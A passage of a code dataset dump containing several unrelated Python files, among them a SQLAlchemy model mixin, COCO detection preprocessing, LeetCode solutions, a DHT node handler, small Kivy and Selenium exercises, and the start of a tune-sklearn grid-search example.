self.control_write(usb1.REQUEST_TYPE_VENDOR, REQ_REGISTER, addr, 0, value)\n except usb1.USBErrorPipe:\n await self._register_error(addr)\n","sub_path":"software/glasgow/device/hardware.py","file_name":"hardware.py","file_ext":"py","file_size_in_byte":22592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"270796336","text":"from sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base, declared_attr, as_declarative\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy import inspect\nfrom db import session\n# Base model the other model(s) will subclass\nBase = declarative_base()\n\nclass BaseModelMixin(object):\n \"\"\"\n Add the ability to perform some queries in any class that subclasses\n this mixin. This prevents alot of repeated code such as, update,\n delete, and getting a specific or multiple instances from the\n corresponding table\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Set all values to None to prevent argument erros\n Keep the create method for more readability\n \"\"\"\n for field in self.get_fields():\n setattr(self, field, None)\n\n def to_dict(self, includes=[], excludes=[]):\n \"\"\"\n WARNING\n This is to be called from an existing instance so it has\n access to existing values\n\n\n Take in a list of includes and/or excludes then return a\n dictionary of fields and values. If includes is passed but\n not excludes, it will return all fields that were in includes.\n If excludes is passed but not includes, it will return all fields\n except those in excludes.\n If neither are passed, it will return ALL fields and values in the model\n \"\"\"\n serialized_fields = {}\n # Get all fields if neither excludes or includes is passed\n if len(includes) == 0:\n for field in self.get_fields():\n if field in excludes:\n continue\n # Make sure the class has the attribute\n try:\n serialized_fields[field] = getattr(self, field)\n except AttributeError:\n raise AttributeError(\"Tried to get field %s but %s doesn't exist\") % (field, field)\n except Exception as e:\n raise Exception(\"Uncaught exception in %s.to_dict() ERROR: %s\" % (self.__class__.__name__, e))\n return serialized_fields\n\n # Get only the fields that were included\n elif len(includes) > 0:\n for field in includes:\n try:\n serialized_fields[field] = getattr(self, field)\n except AttributeError:\n raise AttributeError(\"Tried to get field %s but %s doesn't exist\") % (field, field)\n except Exception as e:\n raise Exception(\"Uncaught exception in %s.to_dict() ERROR: %s\" % (self.__class__.__name__, e))\n return serialized_fields\n\n @classmethod\n def instance_exists(cls, **info):\n \"\"\"\n Try to find an instance with the passed information\n if at least one instance exists, return True else False\n \"\"\"\n instance = session.query(cls).filter_by(**info).first()\n return instance != None\n\n @classmethod\n def get_instance(cls, multiple=False, **info):\n \"\"\"\n Get an instance from the database with the given info\n If multiple is True, this function will return all\n instances that were retrieved.\n Otherwise (and by default) it will return the first.\n If no row was found, this will throw a NoResultFound error\n \"\"\"\n # Don't waste time, 'cache' the query result\n query = session.query(cls).filter_by(**info)\n # .first() will return None if no matching rows were found\n if query.first():\n if multiple:\n return query.all()\n return query.first()\n else:\n raise NoResultFound(f\"\\nFailed to find instance from table '{cls.__tablename__}'\")\n\n @classmethod\n def create(cls, **info):\n \"\"\"\n PLEASE NOTE: To validate fields, you'll need to write validation functions\n review this for more information on validation... https://docs.sqlalchemy.org/en/13/orm/mapped_attributes.html\n If you need to extend this functionality, over ride it by making a new create function\n in your class.\n This takes in a dictionary of information, instantiates a new instance,\n loops the passed info, updates the new instance, adds it to the pending sql,\n commits it to the database and returns the newly created user\n \"\"\"\n # account for the user model because we need\n # to call user.set_password() to properly\n # set the password with encryption\n new_instance = cls()\n if hasattr(cls, \"password_hash\"):\n new_instance.set_password(info.get('password'))\n info.pop('password')\n\n\n for field, value in info.items():\n if hasattr(cls, field):\n if field == \"password_hash\":\n continue\n setattr(new_instance, field, value)\n else:\n raise AttributeError(f\"Tried to set {field} to {value} but this {cls} does not have a {field} field\")\n session.add(new_instance)\n session.commit()\n created_instance = session.query(cls).filter_by(**info).first()\n # Account for Recipes not being able to be fetched with the preceeding query\n if created_instance == None:\n return session.query(cls).filter(cls.id==new_instance.id).first()\n return created_instance\n\n\n @classmethod\n def update(cls, id, **info):\n \"\"\"\n WARNING\n This will NOT work if updating a relationship.\n See the comments in the following SO post\n https://stackoverflow.com/questions/23152337/how-to-update-sqlalchemy-orm-object-by-a-python-dict\n This gets an object from the database matching the id\n then uses the kwargs to update its fields\n \"\"\"\n instance = session.query(cls).get(id)\n for field, value in info.items():\n if hasattr(instance, field):\n setattr(instance, field, value)\n else:\n raise AttributeError(f\"Could not update {cls} instance because {cls} does not have a {field} field\")\n session.commit()\n\n @classmethod\n def delete(cls, id):\n \"\"\"\n This retrieves and deletes an instance from the database\n **May need to take in an extra arg to configure delete behavior**\n \"\"\"\n # get_instance() will raise a NoResultFound error if the user doesn't exist\n instance = cls.get_instance(**{'id': id})\n session.delete(instance)\n session.commit()\n\n @classmethod\n def get_fields(cls):\n \"\"\"\n Get all the names used for the columns in the model definition\n build a list and return them\n \"\"\"\n fields = []\n mapper = inspect(cls)\n for field in mapper.attrs:\n fields.append(field.key)\n return fields\n\n def add_to_relationship(self, field, child):\n \"\"\"\n Add a child to the relationship defined in the field arg\n \"\"\"\n # Account for a non-existent child\n try:\n children = getattr(self, field)\n children.append(child)\n except:\n raise Exception(\"Failed to add %s to %s relationship field %s\" % (child, self, field))\n setattr(self, field, children)\n session.add(self)\n session.commit()\n\n def remove_from_relationship(self, field, child):\n \"\"\"\n Remove a child from the relationship field provided in the argument\n \"\"\"\n try:\n children = getattr(self, field)\n children.remove(child)\n except:\n raise Exception(\"Failed to remove %s from %s relationship field %s\" % (child, self, field))\n setattr(self, field, children)\n sessions.add(self)\n session.commit()\n\n def assign_one_to_one(self, field, instance):\n \"\"\"\n Assign an object to a one to one field (like assigning a profile instance to user.profile)\n \"\"\"\n setattr(self, field, instance)\n session.add(self)\n session.commit()\n\n @staticmethod\n def do_rollback():\n session.rollback()","sub_path":"server/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"214636182","text":"import glob\r\nimport os\r\n\r\ndirs = os.listdir(\".\")\r\nprint(dirs)\r\nfor element in dirs:\r\n if element.endswith(\"out\"):\r\n os.system(\"C:\\\\Strawberry\\\\perl\\\\bin\\\\perl.exe FORCES_modified.pl \" + element[:-4] + \" \" + element[:-4])\r\n\r\n\r\nos.system(\"move *dat dats\\\\\")","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80886810","text":"# preprocessing steps for coco detection and nearest neighbors retrieval\n\nimport detection_util\nimport _pickle\nimport numpy as np\nfrom pycocotools.coco import COCO\n\nfeatures_set = 'features2_tiny'\nD_SET = 1472\n#features_set = 'features2_small'\n#D_SET = 11776\n\nif 'coco_train' not in locals():\n annFile='{}/annotations/instances_{}.json'.format(dataDir, 'train2014') # annotations # slightly weird to load here since passed to this module's fns by another script\n coco_train = COCO(annFile) # initialize COCO api for instance annotations\n \n [img_ids_train, feats_train] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, 'train2014'),'rb'),encoding='latin1')\n img_ids_train, unique_idx = np.unique(img_ids_train, return_index=True)\n img_ids_train = img_ids_train.tolist()\n feats_train = feats_train[unique_idx, :, :, :]\n\nfeaturizer = detection_util.Featurizer()\ncategory_list = ['bear', 'bird', 'cat', 'cow', 'dog', 'elephant',\n 'giraffe', 'horse', 'sheep', 'zebra', 'airplane', \n 'bicycle', 'boat', 'bus', 'car', 'motorcycle', \n 'train', 'truck']\n\ndef get_retrieval_dataset(dataSet, coco, return_feats=True, splitter_mat=[], num_imgs=-1):\n if not return_feats:\n assert splitter_mat.size # non-empty splitter matrix needed to return projections when return_feats = False\n print('getting bbox data...')\n bboxes_store = _pickle.load(open('{}/bboxes_retrieval/{}_bboxes_retrieval.p'.format(dataDir, dataSet),'rb'),encoding='bytes')\n if dataSet == 'train2014':\n img_ids, feats = img_ids_train, feats_train\n else:\n [img_ids, feats] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, dataSet),'rb'),encoding='latin1')\n img_ids, unique_idx = np.unique(img_ids, return_index=True)\n img_ids = img_ids.tolist()\n feats = feats[unique_idx, :, :, :]\n if num_imgs > 0:\n img_ids = img_ids[:num_imgs]\n feats = feats[:num_imgs]\n X = [] # note only 'X' OR 'projections' is used\n projections = []\n bboxes = []\n box_img_ids = []\n box_cats = []\n for img_id in img_ids:\n candidate_boxes = get_bboxes(img_id, bboxes_store) # load saved selective search output # can getting labels be made into fn?\n if candidate_boxes is None:\n# print('image skipped')\n continue\n \n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n cat_id_list = get_cat_id_list(category_list, coco)\n true_boxes = []\n true_box_cats = []\n for ann in anns:\n if ann['category_id'] in cat_id_list:\n true_boxes += [ann['bbox']] # += adds to list\n true_box_cats += [ann['category_id']]\n box_cats_img = np.ones((np.shape(candidate_boxes)[0], 1))*-1\n for i, candidate in enumerate(candidate_boxes):\n best_iou = 0\n for j, true_box in enumerate(true_boxes):\n iou_curr = detection_util.iou(candidate, true_box)\n if iou_curr >= 0.5 and iou_curr > best_iou:\n box_cats_img[i] = true_box_cats[j]\n best_iou = iou_curr\n \n img = coco.loadImgs([img_id])[0]\n img_feats = feats[img_ids.index(img_id)]\n X_img = boxes_to_feats(candidate_boxes, img, img_feats)\n X_img, unique_idx_img = np.unique(X_img, return_index=True, axis=0) # throw out duplicate feat rows\n if X_img is not None: \n if return_feats:\n X.append(X_img)\n else:\n proj_img = np.matmul(X_img, splitter_mat)\n projections.append(proj_img)\n bboxes.append(candidate_boxes[unique_idx_img])\n box_cats.append(box_cats_img[unique_idx_img])\n box_img_ids.append(np.ones((len(unique_idx_img),1))*img_id)\n box_cats = np.squeeze(np.vstack(box_cats))\n bboxes = np.vstack(bboxes)\n box_img_ids = np.squeeze(np.vstack(box_img_ids))\n if return_feats:\n X = np.vstack(X)\n return X, box_cats, bboxes, box_img_ids\n else:\n projections = np.vstack(projections)\n return projections, box_cats, bboxes, box_img_ids\n\ndef get_designed_dataset(dataSet, category, coco, get_pos=True): \n bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs = prepare_labels(dataSet, category, coco)\n print(category, 'pos', len(cat_pos_imgs), 'imgs')\n \n print('getting designed training subsample')\n Xpos = []\n Xneg_p = []\n for img_id in cat_pos_imgs:\n candidate_boxes = get_bboxes(img_id, bboxes_store) # load saved selective search output # can getting labels be made into fn?\n if candidate_boxes is None:\n# print('image skipped')\n continue\n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n true_boxes = []\n for ann in anns:\n if ann['category_id'] == coco.getCatIds(catNms=[category])[0]:\n true_boxes += [ann['bbox']]\n labels = np.array([get_label(candidate, true_boxes) for candidate in candidate_boxes])\n pos_box_idx = np.array([i for i, x in enumerate(labels) if x == 1])\n neg_box_idx = np.array([i for i, x in enumerate(labels) if x == 0])\n neg_boxes_sample_idx = neg_box_idx[np.random.permutation(len(neg_box_idx))[0:len(pos_box_idx)]] #sample as many neg as there are pos\n# neg_boxes_sample_idx = neg_box_idx[np.random.permutation(len(neg_box_idx))[0:(2*len(pos_box_idx))]] #sample twice as many neg as there are pos\n \n pos_boxes = candidate_boxes[pos_box_idx.astype(int)] \n neg_boxes_sample = candidate_boxes[neg_boxes_sample_idx]\n \n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n # img_pil = Image.open('%s/%s/%s'%(dataDir, dataSet, img['file_name']))\n img_feats = feats[img_ids.index(img_id)]\n # img_feats = feats[np.where(img_ids == img_id)]\n \n if get_pos:\n Xpos_img = boxes_to_feats(pos_boxes, img, img_feats)\n if Xpos_img is not None: Xpos.append(Xpos_img)\n Xneg_img = boxes_to_feats(neg_boxes_sample, img, img_feats)\n if Xneg_img is not None: Xneg_p.append(Xneg_img)\n if get_pos: Xpos = np.vstack(Xpos)\n Xneg_p = np.vstack(Xneg_p)\n \n cat_neg_imgs = np.array(cat_neg_imgs)\n cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:len(cat_pos_imgs)]]\n# cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:(2*len(cat_pos_imgs))]]\n draws_per_image = np.shape(Xpos)[0] // len(cat_pos_imgs)\n \n Xneg_n = []\n for img_id in cat_neg_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n \n if candidate_boxes is None:\n# print('image skipped')\n continue\n if np.shape(candidate_boxes)[0] < draws_per_image:\n num_draws = np.shape(candidate_boxes)[0]\n else:\n num_draws = draws_per_image\n \n neg_boxes_sample = candidate_boxes[np.random.permutation(np.shape(candidate_boxes)[0])[0:num_draws]]\n \n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n img_feats = feats[img_ids.index(img_id)]\n \n Xneg_img = boxes_to_feats(neg_boxes_sample, img, img_feats)\n if Xneg_img is not None: Xneg_n.append(Xneg_img)\n Xneg_n = np.vstack(Xneg_n)\n return Xpos, Xneg_p, Xneg_n\n\ndef get_random_dataset(dataSet, category, sample_sizes, coco):\n bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs = prepare_labels(dataSet, category, coco)\n print('selecting', dataSet, 'sample')\n \n cat_pos_imgs = np.array(cat_pos_imgs)\n cat_neg_imgs = np.array(cat_neg_imgs)\n cat_pos_imgs_sample = cat_pos_imgs[np.random.permutation(len(cat_pos_imgs))[0:sample_sizes[0]]]\n cat_neg_imgs_sample = cat_neg_imgs[np.random.permutation(len(cat_neg_imgs))[0:sample_sizes[1]]]\n X = []\n Y = []\n for img_id in cat_pos_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y)\n for img_id in cat_neg_imgs_sample:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y)\n X = np.vstack(X)\n Y = np.vstack(Y)\n return X, Y\n\ndef get_random_boxes_uniform(dataSet, category, boxes_per_image, coco):\n bboxes_store, img_ids, feats, _, _ = prepare_labels(dataSet, category, coco)\n print('selecting', dataSet, 'sample')\n X = []\n Y = []\n for img_id in img_ids:\n candidate_boxes = get_bboxes(img_id, bboxes_store)\n if candidate_boxes is None:\n# print('image skipped')\n continue\n box_sample = candidate_boxes[np.random.permutation(len(candidate_boxes))[:boxes_per_image]]\n append_img_feats(img_id, box_sample, coco, img_ids, feats, X, Y)\n X = np.vstack(X)\n Y = np.vstack(Y)\n return X, Y\n\ndef prepare_labels(dataSet, category, coco):\n bboxes_store = _pickle.load(open('{}/bboxes/{}_bboxes.p'.format(dataDir, dataSet),'rb'),encoding='bytes')\n if dataSet == 'train2014':\n img_ids, feats = img_ids_train, feats_train\n else:\n [img_ids, feats] = _pickle.load(open('{}/{}/{}.p'.format(dataDir, features_set, dataSet),'rb'),encoding='latin1')\n img_ids, unique_idx = np.unique(img_ids, return_index=True)\n img_ids = img_ids.tolist()\n feats = feats[unique_idx, :, :, :]\n \n catId = coco.getCatIds(catNms=[category])\n pos_full = coco.getImgIds(catIds=catId )\n cat_pos_imgs = list(set(pos_full) & set(img_ids))\n cat_neg_imgs = [x for x in img_ids if x not in cat_pos_imgs]\n return bboxes_store, img_ids, feats, cat_pos_imgs, cat_neg_imgs\n\ndef append_img_feats(img_id, candidate_boxes, coco, img_ids, feats, X, Y): # TODO: candidate boxes probably the wrong name to use...\n annIds = coco.getAnnIds(imgIds=img_id, iscrowd=None)\n anns = coco.loadAnns(annIds)\n true_boxes = []\n for ann in anns:\n true_boxes += [ann['bbox']]\n labels = np.zeros((len(candidate_boxes),1))\n labels[:,0] = [get_label(candidate, true_boxes) for candidate in candidate_boxes]\n\n img = coco.loadImgs([img_id])[0] # make sure image ID exists in the dataset given to you.\n img_feats = feats[img_ids.index(img_id)]\n \n X_img = boxes_to_feats(candidate_boxes, img, img_feats)\n if X_img is not None:\n X.append(X_img)\n Y.append(labels)\n\ndef get_bboxes(img_id, bboxes_store):\n bboxes_idx = bboxes_store[0].index(img_id)\n return bboxes_store[1][bboxes_idx]\n\ndef get_label(candidate, true_boxes):\n for true_box in true_boxes:\n if detection_util.iou(candidate, true_box) >= 0.5:\n return 1\n return 0\n\ndef boxes_to_feats(boxes, img, img_feats): \n num_boxes = np.shape(boxes)[0]\n if num_boxes == 0:\n return None\n first_row = box_to_feat(boxes[0], img, img_feats)\n X_img = np.zeros((num_boxes, len(first_row)))\n X_img[0,:] = first_row\n for i in np.arange(1,num_boxes):\n X_img[i,:] = box_to_feat(boxes[i], img, img_feats)\n return X_img\n\ndef box_to_feat(box, img, img_feats):\n projected_box = detection_util.project_onto_feature_space(box, (img['width'], img['height']))\n return featurizer.featurize(projected_box, img_feats)\n\ndef get_cat_id_list(cat_names, coco):\n cats = coco.loadCats(coco.getCatIds()) # categories\n cat_name_to_id = {cat['name']: cat['id'] for cat in cats} # category name to id mapping\n return [cat_name_to_id[cat] for cat in cat_names]\n\ndef concatenate_set(segment_list, label_list):\n lengths = [np.shape(segment)[0] for segment in segment_list]\n Ytemp = [];\n for i, length in enumerate(lengths):\n Ytemp.append(np.ones((length,1))*label_list[i])\n Y = np.vstack(Ytemp)\n X = np.vstack(segment_list)\n return X, Y\n","sub_path":"coco_preprocess.py","file_name":"coco_preprocess.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642622646","text":"#!/usr/bin/python3\n\n# musician_class.py\n__author__ = 'Les Tallman'\n\n\nclass Bands(object):\n\n members = []\n\n def __init__(self, name, manager):\n self.name = name\n self.manager = manager\n # self.hire = hire\n # self.fire = fire\n\n\nclass Musician(Bands):\n def __init__(self, sounds):\n Bands.sounds = sounds\n\n def solo(self, length):\n for i in range(length):\n # print(self.sounds[i % len(self.sounds)], end=\" \")\n print(self.sounds[i % len(self.sounds)])\n print()\n\n\nclass Bassist(Musician): # The Musician class is the parent of the Bassist class\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"Twang\", \"Thrumb\", \"Bling\"])\n\n\nclass Guitarist(Musician):\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"Boink\", \"Bow\", \"Boom\"])\n\n def tune(self):\n print(\"Be with you in a moment\")\n print(\"Twoning, sproing, splang\")\n return \"\\nAll tuned up and ready to Rock & Roll!!\"\n\n\nclass Drummer(Musician):\n def __init__(self, name):\n self.name = name\n # Call the __init__ method of the parent class\n super().__init__([\"bum\", \"brrum\", \"brrrumble\", \"badum tish\"])\n\n def tune(self):\n print(\"Give me a whew, please.\")\n print(\"badum tish! \", \"gada, gada, gada \", \"tink\")\n return \"\\nI'm all warmed up.. Lets do this!!\"\n\n def count(self):\n print(\"\\nOne\", \"\\nTwo\", \"\\nThree\", \"\\nFour\")\n return \"\"\n\n def combust(self):\n print(\"Crackel\", \"Pop\", \"Boom\")\n return \"I'm on FIRE!!!, Baby....\"\n\nguitarist = Guitarist(\"Nigel Nettle\")\nbassist = Bassist(\"Kenny Hood\")\ndrummer = Drummer(\"Cindy Thunder\")\n\nfirst_band = Bands(\"Rip Cords\", \"Kevin Smith\")\nfirst_band.members.append(guitarist.name)\nfirst_band.members.append(bassist.name)\nfirst_band.members.append(drummer.name)\nprint(\"\\nThe Bands name is: {}\".format(first_band.name))\nprint(\"{} is the manager of The {}.\\n\".format(first_band.manager, first_band.name))\nprint(\"Members of the band are:\")\nfor member in first_band.members:\n print(member)\n\nprint(\"\\n\\n\")\nprint(guitarist.name)\nprint(\"Tuning....\")\nprint(guitarist.tune())\n\nprint(\"\\n\")\nprint(drummer.name)\nprint(\"Warming up as well!!\")\nprint(drummer.tune())\n\nprint(bassist.name)\nprint(\"I'm always ready\")\n\nprint(drummer.count())\nguitarist.solo(6)\nbassist.solo(1)\ndrummer.solo(3)\n\nprint(drummer.combust())","sub_path":"musician_class/musician_class.py","file_name":"musician_class.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524388621","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nclass Screenshots():\n\n def test(self):\n driver = webdriver.Chrome()\n driver.maximize_window()\n #driver.get(\"https://learn.letskodeit.com/p/practice\")\n #Открываем стрвницу этой командой\n driver.execute_script(\"window.location = 'https://learn.letskodeit.com/p/practice';\")\n driver.implicitly_wait(5)\n #element = driver.find_element(By.ID, \"name\")\n element = driver.execute_script(\"return document.getElementById('name');\")\n element.send_keys(\"Test\")\n time.sleep(4)\n driver.quit()\n\nrun = Screenshots()\nrun.test()","sub_path":"letskodeit/125javaScriptExecution.py","file_name":"125javaScriptExecution.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195237596","text":"class Solution(object):\r\n def helper(self, allowed, target, so_far, cache):\r\n if len(allowed) == 0:\r\n return False\r\n state = tuple(allowed)\r\n if state in cache:\r\n return cache[state]\r\n else:\r\n cache[state] = False\r\n if max(allowed) + so_far >= target:\r\n cache[state] = True\r\n else:\r\n for x in allowed:\r\n new_allowed = [y for y in allowed if x!=y]\r\n if self.helper(new_allowed, target, so_far+x, cache) == False:\r\n cache[state] = True\r\n break\r\n return cache[state]\r\n\r\n def canIWin(self, maxChoosableInteger, desiredTotal):\r\n allowed = [x for x in range(1, maxChoosableInteger+1)]\r\n if sum(allowed) < desiredTotal:\r\n return False\r\n return self.helper(allowed, desiredTotal, 0, {})\r\n","sub_path":"Linkedin/LC464CanIWin.py","file_name":"LC464CanIWin.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1043086","text":"#\n# @lc app=leetcode id=594 lang=python\n#\n# [594] Longest Harmonious Subsequence\n#\n# https://leetcode.com/problems/longest-harmonious-subsequence/description/\n#\n# algorithms\n# Easy (43.06%)\n# Likes: 415\n# Dislikes: 56\n# Total Accepted: 36.8K\n# Total Submissions: 83.9K\n# Testcase Example: '[1,3,2,2,5,2,3,7]'\n#\n# We define a harmonious array is an array where the difference between its\n# maximum value and its minimum value is exactly 1.\n# \n# Now, given an integer array, you need to find the length of its longest\n# harmonious subsequence among all its possible subsequences.\n# \n# Example 1:\n# \n# Input: [1,3,2,2,5,2,3,7]\n# Output: 5\n# Explanation: The longest harmonious subsequence is [3,2,2,2,3].\n# \n# \n# \n# Note:\n# The length of the input array will not exceed 20,000.\n# \n# \n# \n#\nclass Solution(object):\n def findLHS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n data = {}\n for n in nums:\n data[n] = data.get(n, 0) + 1\n \n max_length = 0\n for key in data:\n max_length = max(max_length, data[key]+data.get(key+1, -float(\"inf\")))\n \n return max_length\n\n\n# if __name__ == \"__main__\":\n# s = Solution()\n# print s.findLHS([1,1,1,1])\n","sub_path":"594.longest-harmonious-subsequence.py","file_name":"594.longest-harmonious-subsequence.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570186071","text":"from threading import Thread\r\nimport time\r\nimport datetime\r\nfrom dht.node import Node\r\n\r\nclass NodeStoreHandler(object):\r\n\r\n def __init__(self, server):\r\n self._server = server\r\n\r\n # we learn about new nodes when\r\n # 1. We are queried by another node\r\n # 2. Another node respond to a find_node or get_peers that we sent\r\n\r\n server.on_query_received.append(self.on_query_received)\r\n server.on_response_received.append(self.on_response_received)\r\n server.on_query_sent.append(self.on_query_sent)\r\n\r\n def on_query_sent(self, transaction):\r\n # Only for bootstrap nodes.\r\n node = transaction.response_node\r\n if node.id_20 and node.ip and node.dht_port:\r\n self._server.remote_nodes.add(transaction.response_node)\r\n\r\n def on_query_received(self, transaction):\r\n # Add the node it querying us.\r\n self._server.remote_nodes.add(transaction.query_node)\r\n\r\n def on_response_received(self, transaction):\r\n # Update the id of the remote node.\r\n transaction.response_node.id_20 = transaction.response[\"r\"][\"id\"]\r\n\r\n # Add the node that reponded to us. We most likely already have this one.\r\n self._server.remote_nodes.add(transaction.response_node)\r\n\r\n # A find_node or get_peers response may carry extra nodes.\r\n if transaction.query[\"q\"] == 'find_node' or transaction.query[\"q\"] == 'get_peers':\r\n nodes = transaction.response[\"r\"].get(\"nodes\", \"\")\r\n\r\n for i in xrange(0, len(nodes), 26):\r\n id_26 = nodes[i:i+26]\r\n if not self._server.remote_nodes.get_node(id_26):\r\n self._server.remote_nodes.add(Node.from_id_26(id_26))\r\n\r\nclass NodeInvalidater(object):\r\n\r\n def __init__(self, server):\r\n self._server = server\r\n\r\n Thread(target=self.invalidate_nodes).start()\r\n\r\n def invalidate_nodes(self):\r\n\r\n while True:\r\n time.sleep(0.5)\r\n for transaction_id, transaction in self._server._running_transactions.items():\r\n if datetime.datetime.now() - transaction.created_at > datetime.timedelta(seconds=60):\r\n self._server.remote_nodes.ban_node(transaction.response_node)\r\n del self._server._running_transactions[transaction_id]\r\n","sub_path":"operators/node_store.py","file_name":"node_store.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312402518","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\n\n\nclass MilesToKs(App):\n def build(self):\n self.title = \"Convert Miles to Kilometres\"\n self.root = Builder.load_file('task_1.kv')\n Window.size = (400, 200)\n return self.root\n\n def handle_increment(self, num):\n if self.root.ids.input_miles.text == \"\":\n self.root.ids.input_miles.text = str(int(0))\n try:\n self.root.ids.input_miles.text = str(int(self.root.ids.input_miles.text) + num)\n except (ValueError, TypeError):\n self.root.ids.label_kilometres.text = \"0.0\"\n\n def calculate(self):\n try:\n self.root.ids.label_kilometres.text = \"*\" + str(int(self.root.ids.input_miles.text) * 1.60)\n except ValueError:\n self.root.ids.label_kilometres.text = \"0.0\"\n\n # def display_label(self):\n # try:\n # self.root.ids.label_kilometres.text = \"*\" + str(int(self.root.ids.input_miles.text) * 1.60)\n # except ValueError:\n # self.root.ids.label_kilometres.text = \"0.0\"\n\n\nMilesToKs().run()\n","sub_path":"Prac06/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298105614","text":"import jieba\nfrom pathlib import Path\nfrom collections import defaultdict\nfrom queue import PriorityQueue\n\nfile_in = \"../../data/couplet_dataset/merge.in.txt\"\nfile_out = \"../../data/couplet_dataset/top_{}_keywords.txt\"\nstopwords = \"../../data/couplet_dataset/stopwords.txt\"\n\n\ndef parse_stopwords(file_in):\n res = set()\n with open(file_in, 'r', encoding = 'utf-8') as fin:\n lines = fin.readlines()\n for line in lines:\n res.add(line.strip())\n return res\n\n\ndef parse_file(file_in, sw):\n freq = defaultdict(int)\n with open(file_in, 'r', encoding = 'utf-8') as fin:\n lines = fin.readlines()\n for line in lines:\n line = line.strip()\n line = line.replace(\" \", \"\")\n words = jieba.cut(line)\n for word in words:\n if word not in sw:\n freq[word] += 1\n return freq\n\n\ndef topk(file_out, freq, k = 100):\n file_out = file_out.format(k)\n pq = PriorityQueue()\n for key in freq:\n pq.put((-1 * freq[key], key))\n with open(file_out, 'w', encoding = 'utf-8') as fout:\n for i in range(k):\n fout.write(\"{} {}\\n\".format(pq.get(i)[1], pq.get(i)[0] * -1))\n print(\"{} {}\".format(pq.get(i)[1], pq.get(i)[0] * -1))\n\n\nif __name__ == \"__main__\":\n sw = parse_stopwords(stopwords)\n freq = parse_file(file_in, sw)\n topk(file_out, freq, 200)","sub_path":"nlp/preprocess/words_count.py","file_name":"words_count.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66589187","text":"'''\nSolution: https://blog.csdn.net/fuxuemingzhu/article/details/79434100\n'''\n# Not understand\ndef singleNumber(self, nums):\n xor = 0\n num1, num2 = 0, 0\n for num in nums:\n xor ^= num\n mask = 1\n while xor & mask == 0:\n mask = mask << 1\n for num in nums:\n if num & mask == 0:\n num1 ^= num\n else:\n num2 ^= num\n return [num1, num2]\n\n# 99% in dic O(n)\ndef singleNumber(self, nums):\n dic = {}\n for i in nums:\n dic[i] = dic.get(i, 0) + 1\n if dic[i] == 2:\n del dic[i]\n return list(dic)","sub_path":"Project/Leetcode/Bit manimulation/260. Single Number III.py","file_name":"260. Single Number III.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512102060","text":"\"\"\"\nAn example training a LogisticRegression model, performing grid search\nusing TuneGridSearchCV.\n\nThis example uses early stopping to further improve runtimes\nby eliminating worse hyperparameter choices early based off\nof its average test score from cross validation. Usually\nthis will require the estimator to have `partial_fit`, but\nwe use sklearn's `warm_start` parameter to do this here.\nWe fit the estimator for one epoch, then `warm_start`\nto pick up from where we left off, continuing until the\ntrial is early stopped or `max_iters` is reached.\n\"\"\"\n\nfrom tune_sklearn import TuneGridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\n\nx, y = load_iris(return_X_y=True)\nx_train, x_test, y_train, y_test = train_test_split(x, y, 